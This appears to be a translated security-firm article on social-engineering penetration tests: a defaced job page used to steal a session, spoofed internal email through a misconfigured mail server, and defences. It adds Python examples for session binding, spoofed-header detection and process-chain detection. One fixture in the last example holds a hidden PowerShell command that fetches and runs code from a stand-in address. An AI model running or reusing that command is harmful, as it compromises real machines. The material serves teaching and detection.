Lie to me if you can: what a sociotechnical pentest looks like in practice
Imagine this situation. A cold October morning, a design institute in the administrative center of one of Russia's regions. Someone from the HR department opens one of the job postings on the institute's website, published a couple of days ago, and finds a photograph of a cat there. The morning quickly stops being boring...
In this article Pavel Suprunyuk, technical director of the Group-IB Audit and Consulting Department, discusses the role social engineering plays in practical security assessment projects, the unusual forms it can take, and how to defend against such attacks. The author notes that the article is an overview; if readers are interested in a particular aspect, Group-IB experts will gladly answer questions in the comments.
Part 1. Why so serious?
Let's get back to our cat. After a while the HR department deletes the photo (screenshots here and below are partially retouched so as not to reveal real names), but it stubbornly comes back; it is deleted again, and this repeats several more times. HR concludes that the cat has the most serious intentions and is not going anywhere, and calls in the web developer, the person who built the site, understands it, and now administers it. The developer visits the site, removes the annoying cat once more, discovers that it was posted from the HR department's own account, assumes that the HR password has leaked to some online hooligans, and changes it. The cat does not appear again.
What really happened? Group-IB specialists were conducting a penetration test of the group of companies to which the institute belonged, in a format close to Red Teaming (that is, a simulation of targeted attacks on the company using the most advanced methods and tools from the arsenal of hacker groups). We wrote about Red Teaming in detail here. It is important to know that in such a test a very wide range of pre-agreed attacks can be used, including social engineering. Obviously, placing the cat was not the end goal of what was going on. What actually happened was the following:
- The institute's website was hosted on a server inside the institute's own network, not on third-party servers;
- A leaked HR department account was found (a message log file lying in the web root of the site). That account could not administer the site, but it could edit the job pages;
- With a stolen administrator session identifier one could get full access to the site, upload executable PHP pages and thereby gain access to the server's operating system, and then to the local network itself, which was an important intermediate goal of the project.
The attack ended in partial success: the administrator's session identifier was stolen, but it was bound to an IP address. We could not get around that, and we could not raise our privileges on the site to administrator, but we did improve our mood. The final result was eventually achieved on another part of the network perimeter.
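The control that stopped the stolen administrator session above is easy to get wrong: the check has to run server-side on every request, not only at login. The following is an added example, not code from the original article or from the institute's site, of a minimal session store that binds each session identifier to the client address it was issued to. The `admin` user, the session lifetime, and the 10.0.0.15 / 203.0.113.7 client addresses are all constructed for illustration.

```python
# Added example (not from the original article): a server-side session store
# that binds every session identifier to the client IP it was issued to, so a
# cookie stolen via a web page or a phishing lure cannot simply be replayed
# from an attacker's host. All names, addresses and the TTL are hypothetical.
import secrets

SESSION_TTL = 3600  # seconds; assumed lifetime of an administrator session


class SessionStore:
    def __init__(self):
        self._sessions = {}  # session_id -> {"user", "ip", "issued"}

    def create(self, user, client_ip, now):
        """Issue a fresh random session id and record who and where it belongs to."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "ip": client_ip, "issued": now}
        return sid

    def resolve(self, sid, client_ip, now):
        """Return the user behind a presented session id, or None if the id is
        unknown, expired, or presented from an address other than the one it
        was issued to. This runs on every request, not only at login."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if now - rec["issued"] > SESSION_TTL:
            self._sessions.pop(sid, None)  # expired: forget it
            return None
        if rec["ip"] != client_ip:
            # Stolen cookie replayed from elsewhere. Reject without revoking, so
            # a remote attacker cannot log the real administrator out at will;
            # in production this is the event to alert on.
            return None
        return rec["user"]


def demo(now=1_000_000.0):
    """Walk through the scenario from the article with constructed addresses."""
    store = SessionStore()
    sid = store.create("admin", "10.0.0.15", now)            # admin logs in from the office
    return {
        "owner": store.resolve(sid, "10.0.0.15", now + 10),             # legitimate use: "admin"
        "stolen_from_outside": store.resolve(sid, "203.0.113.7", now + 10),  # replay from the Internet: None
        # Caveat: the binding is only as strong as the uniqueness of the source
        # address. A foothold behind the same NAT or on the same host passes.
        "stolen_same_address": store.resolve(sid, "10.0.0.15", now + 20),
        "expired": store.resolve(sid, "10.0.0.15", now + SESSION_TTL + 1),  # None after TTL
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The last two entries of `demo()` are the caveat a practitioner should keep in mind: address binding defeats replay from a different network but not from a compromised machine on the same network segment, and a session must still expire on its own.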
Part 2. I am writing to you – what more is there to say? And I'm calling you, and walking around your office dropping flash drives
What happened with the cat is an example of social engineering, albeit not quite a classic one. In fact there was more to this story: there was the cat, the institute, the HR department and the developer, but there were also emails with clarifying questions, supposedly written by "candidates", sent to the HR department itself and to the developer personally in order to provoke them into visiting the page on the site.
Speaking of emails. Ordinary email, probably the main vehicle for social engineering, has not lost its relevance in a couple of decades and sometimes leads to the most unusual consequences.
We often tell the following story at our events, since it is very illustrative.
Usually, based on the results of projects involving social engineering, we compile statistics which, as everyone knows, are dry and boring: so many percent of recipients opened the attachment, so many followed the link, and these three actually entered their username and password. In one project we got more than 100% password entry, that is, more passwords than the emails we had sent out.
It happened like this: a phishing email was sent, supposedly from the CISO of a state corporation, demanding that recipients "urgently test the changes in the mail service". The email landed with the head of a large technical support unit. The manager was very diligent in carrying out orders from senior management and forwarded it to all of his subordinates. The call center itself was quite large. In general, situations where someone forwards an "interesting" phishing email to colleagues, and they fall for it too, are quite common. For us this is the best possible feedback on the quality of the email's wording.
A little later we got to the bottom of it (the email was retrieved from a compromised mailbox):
The success of this attack was due to the mailing exploiting a number of technical flaws in the client's mail system. It was configured so that anyone could send emails on behalf of any sender within the organization without authentication, even from the Internet. That is, you could pose as the CISO, the head of technical support, or anyone else. Moreover, the mail client, seeing a message from "its own" domain, helpfully inserted the sender's photo from the address book, which made the sender look all the more genuine.
To be fair, this attack does not involve particularly sophisticated technology; it is a successful exploitation of a very basic flaw in mail configuration. It is regularly covered on specialized IT and information security resources, yet companies with this problem are still found. Since nobody is inclined to scrutinize the service headers of the SMTP protocol, a message is usually judged "dangerous" or not by the warning icons of the mail client, which do not always reflect the full picture.
Interestingly, this vulnerability also works in the other direction: an attacker can send an email on behalf of your company to an external recipient. For example, he can forge an invoice for a regular payment on your behalf, substituting someone else's bank details for yours. Leaving aside the issues of anti-fraud and cashing out, this is probably one of the easiest ways to steal money using social engineering.
Besides stealing passwords via phishing, a classic sociotechnical attack is the distribution of executable attachments. If these attachments get past all the protective tools, of which modern companies usually have many, a remote access channel to the victim's computer is established. To demonstrate the consequences of an attack, the resulting remote control can be developed all the way to access to sensitive information. Notably, the vast majority of the attacks that alarm everyone in the media begin exactly this way.
In our audit department, out of interest, we keep approximate statistics: what is the total asset value of the companies in which we obtained "Domain Administrator" level access mainly through phishing and mailing of executable attachments? This year it reached approximately 150 billion euros.
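The "service headers" the paragraph above says nobody reads are exactly where this spoofing is visible: a message whose From address claims the company's own domain but which the company's Internet-facing MX accepted from an outside address. The following is an added example, not code from the original article or from Group-IB, of such a header check run over two constructed messages. The domain example.com, the border MX name mx.example.com, the internal address ranges, and both sample messages are assumptions made for illustration.

```python
# Added example (not from the original article): flag messages that claim an
# internal sender but entered through the Internet-facing MX, the condition
# behind the "CISO" mailing described above. Domain, MX name, address ranges
# and the two sample messages are constructed for illustration.
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAIN = "example.com"          # assumed company domain
BORDER_MX = "mx.example.com"             # assumed Internet-facing MX host
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
_RECV_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")   # "[a.b.c.d]" inside a Received line


def _is_internal(ip_text):
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def origin_ip_at_border(msg):
    """Source IP recorded by our own border MX, or None if the message never
    crossed it (i.e. it really originated inside). Only the hop written by our
    MX is trustworthy: any Received lines below it came with the message and
    can be forged by the sender, so they are deliberately ignored."""
    for hop in msg.get_all("Received", []):       # top of the header = latest hop
        flat = " ".join(hop.split())               # unfold continuation lines
        if re.search(r"\bby\s+" + re.escape(BORDER_MX) + r"\b", flat, re.I):
            m = _RECV_IP.search(flat)
            return m.group(1) if m else "unknown"
    return None


def check_message(raw):
    """Return a list of findings for one RFC 5322 message; empty means no spoofing signs."""
    msg = message_from_string(raw)
    _, from_addr = parseaddr(msg.get("From", ""))
    if from_addr.rpartition("@")[2].lower() != INTERNAL_DOMAIN:
        return []                                  # external sender: out of scope here
    findings = []
    origin = origin_ip_at_border(msg)
    if origin is not None and not _is_internal(origin):
        findings.append(f"From claims {INTERNAL_DOMAIN} but {BORDER_MX} accepted it from {origin}")
    auth = " ".join(msg.get("Authentication-Results", "").split()).lower()
    if origin is not None and "spf=pass" not in auth:
        findings.append("internal sender arrived from outside without an SPF pass")
    return findings


# Constructed sample: the spoofed "CISO" message relayed in from the Internet.
SPOOFED = "\n".join([
    "Received: from mail.example.com (mail.example.com [10.0.0.25])",
    "\tby exchange01.example.com with ESMTP; Mon, 14 Oct 2019 09:12:01 +0300",
    "Received: from relay.attacker-hosting.example (relay.attacker-hosting.example [203.0.113.7])",
    "\tby mx.example.com with ESMTP; Mon, 14 Oct 2019 09:12:00 +0300",
    "Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=ciso@example.com",
    'From: "CISO" <ciso@example.com>',
    "To: support-lead@example.com",
    "Subject: Urgent: test the changes in the mail service",
    "",
    "Please confirm the new mail service settings today.",
])

# Constructed sample: a genuinely internal message that never touched the border MX.
LEGIT = "\n".join([
    "Received: from ws-0417.example.com (ws-0417.example.com [10.0.4.17])",
    "\tby exchange01.example.com with ESMTP; Mon, 14 Oct 2019 09:30:00 +0300",
    'From: "Ivan" <ivan@example.com>',
    "To: support-lead@example.com",
    "Subject: lunch",
    "",
    "Going for lunch at one.",
])

if __name__ == "__main__":
    print("spoofed:", check_message(SPOOFED))   # two findings
    print("legit:  ", check_message(LEGIT))     # []
```

This is a detection layer, not the fix. The fix for the flaw the article describes is to require authentication on the submission port and to have the inbound MX reject mail whose envelope sender is your own domain unless it passes SPF/DKIM, then publish a DMARC policy so that other organizations reject the "outbound" variant of the forgery as well.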
Obviously, sending out provocative emails and posting photographs of cats on websites are not the only forms of social engineering. With these examples we wanted to show the variety of attack forms and their consequences. Besides emails, a potential attacker can make phone calls to obtain the information he needs, scatter media (for example, flash drives) with executable files around the target company's office, get a job as an intern, or gain physical access to the local network under the guise of a CCTV camera installer. All of these, by the way, are examples from our successfully completed projects.
Part 3. Learning is light, ignorance is darkness
A reasonable question arises: fine, social engineering exists and it looks dangerous, but what should companies do about it? Captain Obvious hurries to the rescue: you need to defend yourself, and comprehensively. Part of the defence will consist of measures that have already become classic, such as technical information protection tools, monitoring, and organizational and legal support for processes, but the main part, in our opinion, should go into direct work with employees as the weakest link. After all, no matter how much you harden the technology or how strict the regulations you write, there will always be a user who finds a new way to break everything. Moreover, neither regulations nor equipment can keep pace with the flight of a user's creativity, especially when a qualified attacker is coaching him.
First of all, users need to be educated: it must be explained that situations involving social engineering can arise even in their routine work. For our customers we often run digital hygiene courses, a training that teaches basic skills for countering attacks in general.
I would add that one of the best protective measures is not memorizing information security rules but a slightly detached assessment of the situation:
- Who is my interlocutor?
- Where did this offer or request come from (it never happened before, and now it suddenly appears)?
- What is unusual about this request?
Even an unusual font in an email or a style of speech atypical for the sender can trigger a chain of doubt that stops the attack. Written instructions are also needed, but they work differently: they cannot describe every possible situation. For example, security administrators write in them that you must not enter your password on third-party resources. But what if the password is requested by "your own", "corporate" network resource? The user thinks: "There are already two dozen services with a single account in our company, why shouldn't another one appear?" Another rule follows from this: a well-organized workflow also directly affects security. If a neighbouring department can request information from you only in writing and only through your manager, then a person "from a trusted partner of the company" will not be able to request it by phone, because for you that would be absurd. It is especially worth being wary if your interlocutor demands that everything be done right now, or "ASAP", as it is fashionable to write. Even in normal work such a situation is often unhealthy, and under conditions of a possible attack it is a strong trigger. No time to explain, run my file!
We notice that the pretexts for sociotechnical attacks that users always fall for are topics related to money in one form or another: promised bonuses, perks and gifts, as well as information supposedly about local gossip and intrigue. In other words, the banal "deadly sins" work: a thirst for profit, greed and excessive curiosity.
Good training should always include practice. Here, penetration testing experts can come to the rescue. The next question is what and how to test. At Group-IB we offer the following approach: first choose the focus of the test, either assessing the readiness for attacks of the users themselves, or checking the security of the company as a whole; then test using social engineering methods that simulate real attacks, that is, the same phishing, mailing of executable documents, phone calls and other techniques.
In the first case, the attack is carefully prepared together with the customer's representatives, mainly its IT and information security specialists. The pretexts, tools and attack techniques are agreed in advance. The customer itself provides the focus groups and lists of users for the attack, including all the necessary contacts. Exceptions are created in the protection tools, since the messages and executable payloads must reach the recipients: in such a project only people's reactions are of interest. Optionally, markers can be built into the attack from which a user could guess that it is an attack, for example a couple of spelling mistakes in the messages, or inaccuracies in copying the corporate branding. At the end of the project we get those very "dry statistics": which focus groups reacted to the scenarios and to what extent.
In the second case, the attack is carried out with zero initial knowledge, the "black box" method. We independently collect information about the company, its employees and its network perimeter, create pretexts for the attacks, select methods, look for the defensive tools the target company is likely to use, adapt our tools, and write scripts. Our experts use both classic open-source intelligence (OSINT) methods and Group-IB's own product, Threat Intelligence, a system that, when preparing for phishing, can act as an aggregator of information about a company over a long period, including information from closed sources. Of course, so that the attack does not become an unpleasant surprise, its details are also agreed with the customer. The result is a full-fledged penetration test, but one based on advanced social engineering. A logical option in this case is to develop the attack inside the network, up to obtaining the highest privileges in internal systems. Incidentally, we use sociotechnical attacks in the same way in Red Teaming and in some penetration tests. As a result, the customer receives an independent, comprehensive view of their security against a certain type of sociotechnical attack, as well as a demonstration of the effectiveness (or, conversely, ineffectiveness) of the line of defence they have built against external threats.
We recommend such exercises at least twice a year. Firstly, every company has staff turnover, and employees gradually forget previous experience. Secondly, attack methods and techniques are constantly changing, and this requires adapting security processes and defences.
As for technical measures against such attacks, the following help the most:
- Mandatory two-factor authentication on services published to the Internet. Publishing such services in 2019 without Single Sign-On, without password protection and without two-factor authentication in a company of several hundred people is tantamount to an open "break me" invitation. Properly implemented protection makes immediate use of stolen passwords impossible and buys time to deal with the consequences of a phishing attack.
- Access control monitoring, minimization of user rights in systems, and following the secure configuration guidelines that every major vendor publishes. These measures are often simple in nature, very effective, and hard to implement in practice, and everyone neglects them to one degree or another for the sake of speed. Some of them are so essential that without them no protective tool can save you.
- A well-built email filtering chain: anti-spam, scanning of all attachments for malicious code, including dynamic analysis in sandboxes. A well-prepared attack implies that the executable attachment will not be detected by antivirus tools. The sandbox, on the other hand, tests everything on itself, using the files in the same way people would; as a result, a malicious component is revealed by the changes it makes inside the sandbox.
- Protection against targeted attacks. As already noted, classic antivirus tools will not detect the malicious files of a well-prepared attack. The most advanced products automatically monitor the whole set of events occurring on the network, both at the level of an individual host and at the level of traffic within the network. During an attack, very characteristic chains of events appear that can be tracked and stopped if you have this kind of event-focused monitoring.
The original article was published in the journal Information Security / Information Security, No. 6, 2019.
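The "characteristic chain of events" of an executable-attachment attack on a host is concrete enough to be written down as a rule: a mail client or office application spawning a script interpreter or shell, which then opens an outbound connection. The following is an added example, not code from the original article or from any product mentioned in it, of that chain detection run over constructed process-creation and network-connection events. The host names, process identifiers, command lines and the 203.0.113.7 address are all made up for illustration, and the event shape mimics generic endpoint telemetry rather than any vendor's log format.

```python
# Added example (not from the original article): detect the process chain a
# malicious attachment typically produces on a workstation. All telemetry
# below is constructed; the event layout is generic, not a product's format.
from collections import defaultdict

OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# Constructed telemetry: "proc" = process creation, "net" = outbound connection.
EVENTS = [
    {"ts": 1, "type": "proc", "host": "ws-0417", "pid": 4100, "ppid": 900, "image": "explorer.exe"},
    {"ts": 2, "type": "proc", "host": "ws-0417", "pid": 4210, "ppid": 4100, "image": "outlook.exe"},
    {"ts": 3, "type": "proc", "host": "ws-0417", "pid": 4388, "ppid": 4210, "image": "winword.exe",
     "cmdline": 'winword.exe /n "C:\\Users\\u\\AppData\\Local\\Temp\\resume.docm"'},
    {"ts": 4, "type": "proc", "host": "ws-0417", "pid": 4402, "ppid": 4388, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://203.0.113.7/a')\""},
    {"ts": 5, "type": "net", "host": "ws-0417", "pid": 4402, "dst": "203.0.113.7", "dport": 443},
    # Benign activity on another host: Word opened from Explorer and printing.
    {"ts": 6, "type": "proc", "host": "ws-0502", "pid": 3100, "ppid": 800, "image": "explorer.exe"},
    {"ts": 7, "type": "proc", "host": "ws-0502", "pid": 3150, "ppid": 3100, "image": "winword.exe"},
    {"ts": 8, "type": "proc", "host": "ws-0502", "pid": 3160, "ppid": 3150, "image": "splwow64.exe"},
    # An administrator starting PowerShell from Explorer: a shell, but no office ancestor.
    {"ts": 9, "type": "proc", "host": "ws-0502", "pid": 3200, "ppid": 3100, "image": "powershell.exe"},
    {"ts": 10, "type": "net", "host": "ws-0502", "pid": 3200, "dst": "10.0.0.5", "dport": 5985},
]


def detect_attachment_chains(events):
    """Return one finding per script-host process that has an office/mail
    application anywhere in its ancestry (so winword -> cmd -> powershell is
    caught too), with any outbound connections it made afterwards."""
    procs = defaultdict(dict)                      # host -> pid -> creation event
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "proc":
            procs[ev["host"]][ev["pid"]] = ev

    def ancestry(host, pid):
        chain, seen = [], set()                    # child first; "seen" guards pid reuse loops
        while pid in procs[host] and pid not in seen:
            seen.add(pid)
            chain.append(procs[host][pid]["image"].lower())
            pid = procs[host][pid]["ppid"]
        return chain

    findings = []
    for host, table in procs.items():
        for pid, ev in table.items():
            if ev["image"].lower() not in SCRIPT_HOSTS:
                continue
            chain = ancestry(host, pid)
            if not any(image in OFFICE_PARENTS for image in chain[1:]):
                continue
            conns = [f'{e["dst"]}:{e["dport"]}' for e in events
                     if e["type"] == "net" and e["host"] == host
                     and e["pid"] == pid and e["ts"] > ev["ts"]]
            findings.append({"host": host, "pid": pid,
                             "chain": " <- ".join(chain),
                             "cmdline": ev.get("cmdline", ""),
                             "connections": conns,
                             "severity": "high" if conns else "medium"})
    return findings


if __name__ == "__main__":
    for f in detect_attachment_chains(EVENTS):
        print(f'{f["severity"]}: {f["host"]} pid {f["pid"]}: {f["chain"]} -> {f["connections"]}')
```

The benign rows are there on purpose: a plain PowerShell session and Word launching the print helper produce nothing, while the same interpreter under a document opened from Outlook is flagged, and the follow-on connection raises the severity. Real telemetry needs the same correlation by host and process lineage, plus a time window and a larger allow-list of legitimate office child processes to keep the noise down.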